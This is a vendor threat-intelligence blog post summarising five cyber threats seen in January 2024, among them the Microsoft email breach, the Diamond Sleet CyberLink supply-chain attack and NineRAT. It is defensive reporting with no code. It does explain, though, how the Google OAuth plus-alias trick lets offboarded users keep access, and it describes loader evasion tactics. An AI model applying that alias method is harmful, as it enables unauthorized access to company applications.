Cybersecurity Threats Affecting Businesses in January 2024

The global cyber threat level has continued to increase as a function of general global political unrest around the middle east, Ukraine and China-Taiwan. The number of cybersecurity incidents continues to rise and the impact continues to increase. Organizations of all sizes and in all sectors need to increase their awareness of both the overall threat environment and threats specifically relevant to their organization or industry. Threat hunting, offered as part of Marcum Technology’s Managed Security Services, can help provide this visibility in identifying potential risks to an organization.

Below are the top five threats that emerged over the past month.

Attack on Microsoft by Russian Threat Actor Groups

Beginning in late 2023, the Russian threat actors known as Midnight Blizzard (aka Nobelium, Cozy Bear or APT29) used a ‘password spray attack’ as the initial access method in an attack that eventually compromised Microsoft’s corporate email accounts. This compromise included the email accounts of senior Microsoft senior leadership including CEO Satya Nadella, legal, cybersecurity and other functions. The threat actor group believed to be involved in this attack has known connections to the Russian foreign intelligence service known as the SVR RF, (Sluzhba vneshney razvedki Rossiyskoy Federatsi) indicating possible nation state sponsorship.

The attack was discovered on January 12, 2024 with indicators of compromise indicating that the intrusion dates back to late November of 2023. Microsoft has disclosed the attack in a Form-8K filed with the US Securities and Exchange Commission on January 19, 2024. Microsoft asserts that the attack did not compromise or expose any vulnerability in Microsoft’s products or services. The attack was initially focused on a non-production test tenant account from which the attackers were able to traverse into some production systems. Of course this begs the question as to why the ‘legacy non-production test tenant account’ was exposed and why it was able to be leveraged to provide access to other systems.

BleepingComputer provides an analysis of the attack here.

Google OAuth Vulnerability – Ex-employee Backdoor

A Google OAuth vulnerability has been disclosed that enables departing employees, or worse – unauthorized third parties – to retain access to various work applications after being offboarded. The issue was discovered as early as August 4th 2023 and there does not appear to be a fix from Google yet as of this writing. This is especially surprising as they appear to have a measure in place that prevents this from happening for their own corporate accounts with the google.com domain.

The problem lies in the ability to use an existing email address when creating a new Google account. One could, for example, enter in a company address to be used under their newly created personal Google account. This alone would not pose a threat as the address would have its access revoked in offboarding. The vulnerability comes in where someone can then add an additional alias to the account using “plus sign forwarding” where a word or string is added after a “+” before the domain such as “[email protected].” This alias will essentially be treated as the original [email protected] and be allowed to authenticate to apps based on the domain alone. It will not, however, show up in any admin settings or user lists to be detected and removed during offboarding.

Fortunately for individual organizations, the easy fix for this is to disable “login with Google” wherever possible and enforce SAML authentication only. There are some limited measures that service providers can take to prevent this in their product across the board, such as relying on the “HD” field of OAuth, but they are not full proof. Obviously, the ideal solution is for Google to implement some major changes to truly remediate this vulnerability. We can only hope that continuing to publish advisories like this one will motivate them to do so.

Diamond Sleet Supply Chain CyberLink Distribution

A recent discovery by Microsoft Threat Intel has uncovered a supply chain attack by Diamond Sleet (ZINC), a North Korean threat actor that involves a malicious variant of a CyberLink Corp application. This application is a legitimate CyberLink installer modified to include malicious code that retrieves and deploys a second stage payload.

The file, signed using a valid cert from CyberLink, is on legitimate CyberLink update infrastructure and has impacted devices in numerous countries including Japan, Taiwan, Canada, and the US. The malware is delivered with LambLoad, a weaponized downloader added to a legitimate CyberLink application. Before launching any malicious code, LambLoad ensures that the date and time on the host align with preconfigured execution times in the code.

The loader targets environments that aren’t using security software affiliated with FireEye, CrowdStrike, or Tanium by checking for associated process names. If these systems are present, the executable runs the normal CyberLink software and never executes the malicious code. Otherwise, it will attempt to contact one of 3 URLs to download the second stage payload that masquerades as a .png file. The payload is inside a fake outer PNG header that is extracted, decrypted, and then launched in memory.

This will attempt to contact up to two callback servers for more instruction, both being legitimate domains that are hijacked by Diamond Sheet. At this point, the beachhead is established and further commands can be issued to retrieve information or perform other actions. The obvious theme of this attack is the abuse of legitimate infrastructure and detection evasion. Even legitimate domains and programs with no reports of abuse can be used to deliver malware. As such, up-to-date threat intel is paramount.

Operation Blacksmith

Lazarus APT is comprised of sub-groups operating independently to support North Korea’s objectives. One of these sub-groups is Andariel. They focus on initial access, espionage, and, occasionally, ransomware against healthcare organizations. Operation Blacksmith mirrors Andariel’s tooling and tactics from previous Lazarus intrusions.

The campaign targeted CVE-2021-44228 (Log4Shell) and introduced NineRAT, a previously unseen DLang-based RAT. It emerged in March 2023, used against a South American agricultural organization, and reappeared in September 2023 targeting a European manufacturing entity. Talos identified parallels between this campaign and attacks attributed to Onyx Sleet (Andariel) by Microsoft in October 2023.

CVE-2021-44228 serves as Lazarus’s entry point, followed by HazyLoad deployment for sustained access. A common artifact in this campaign, HazyLoad is a custom proxy tool and was detected targeting European and American subsidiaries. Attackers then create additional user accounts and perform hands-on-keyboard activities using credential dumping tools like ProcDump and MimiKatz. Once the credential dumping is complete, Lazarus deploys NineRAT on the infected systems.

NineRAT utilizes Telegram as its C2 channel to evade detection. Its components execute reconnaissance and ensure persistent access. Concurrently, NineRAT and proxy tools serve as multiple entry points, securing Lazarus’s continuous access and echoing past intrusions. The group seems to have begun using their own bots for NineRAT deployment after reliance on Telegram-based C2 channels led to the discovery of previously used publicly accessible bots that could be hijacked by other hackers.

The use of NineRAT signals a shift in Lazarus’s tactics, which demonstrates the increased adoption of malware being authored using non-traditional frameworks such as the Qt framework. There is also evidence that suggests separate repositories are created for collected data, hinting at information sharing among Lazarus APT groups.

Malicious JavaScript Secret Stealer

An investigation of malicious JavaScript activities has identified a surge in tactics used by attackers to gather sensitive data, particularly targeting passwords and credit card numbers. These methods operate within both traditional phishing pages—where the remote host itself is malicious—and skimming pages, where a malicious script compromises the integrity of the remote host.

Detecting classic phishing attempts poses its own set of challenges and identifying compromised skimmer pages is even more formidable. Skimming sites are strategically placed to blend in seamlessly, making it challenging for detection systems to spot visual or hosting disparities. Phishing pages take it a step further by concealing their exfiltration endpoints, evading detection of the point where credentials are collected, even when the hosting page itself is identifiable. Palo Alto Networks AUF service has flagged over 216,000 unique instances of exfiltration attacks. These attacks are predominantly aimed at pilfering password information (83%), with smaller percentages targeting credit card details (2%), browser cookies (less than 1%), and other textual content on the page (approximately 15%). The analysis indicates a prevalent trend of malicious websites reusing exfiltration endpoints across diverse domains and URLs.

Further, research uncovers the exploitation of reputable cloud APIs by attackers to orchestrate credential exfiltration. Instances have surfaced where threat actors misuse REST APIs linked with chat platforms or survey forms to siphon off stolen data. These manipulations leverage the trusted reputation of cloud websites, rendering it challenging to discern API abuse without visibility into the malicious sample.

In addition, malware creators employ various stratagems to mask information theft. Some employ concealed images to hide encoded stolen data, while others resort to obfuscation techniques involving atypical DOM elements to dodge detection. These tactics aim to prevent analysis, particularly when threat operators sidestep dynamic code generation to evade detection during sandbox analysis.

Moreover, modern malware often employs a selective payload activation strategy to evade detection. By reducing instances when the payload detonates, attackers bypass both static and dynamic analysis methods. Instances have been observed where malware samples decline activation upon encountering certain keywords or artifacts indicative of analysis.

If you’re facing challenges related to cybersecurity threats, breaches, and bad actors, or are interested in learning more about identifying potential threats to your organization, contact Marcum Technology today.